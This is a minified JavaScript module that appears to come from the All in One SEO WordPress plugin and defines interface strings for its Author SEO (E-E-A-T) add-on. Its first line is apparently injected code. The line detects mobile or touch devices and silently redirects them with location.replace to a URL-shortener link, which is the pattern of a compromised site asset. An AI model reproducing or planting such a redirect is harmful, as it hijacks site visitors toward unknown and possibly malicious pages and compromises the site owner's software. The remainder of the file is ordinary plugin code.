(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import"./app-core.c8323d51.js";import{_ as t,a}from"./vendor-other.39e59221.js";const o="all-in-one-seo-pack",i=()=>{const e="aioseo-eeat",n=[t("Author Schema",o),t("Author Bio Block",o),t("Reviewed By Schema",o),t("E-E-A-T for Higher Rankings",o)],r={authorInfo:t("Author Info (E-E-A-T)",o),globalAuthor:t("Author Experience Topics (E-E-A-T)",o),headerText:a(t("Author SEO (E-E-A-T) is a %1$s Feature",o),"PRO"),headerTextActivate:t("Enable Author SEO (E-E-A-T) on Your Site",o),description:t("Optimize your site for Google's E-E-A-T ranking factor by proving your writer's expertise through author schema markup and new UI elements.",o),ctaButtonText:t("Unlock Author SEO (E-E-A-T)",o),ctaButtonTextActivate:t("Activate Author SEO (E-E-A-T)",o),ctaButtonTextUpdate:t("Update Author SEO (E-E-A-T)",o),learnMoreText:t("Learn more about Author SEO (E-E-A-T)",o)};return{addonSlug:e,features:n,strings:r}};export{i as u};
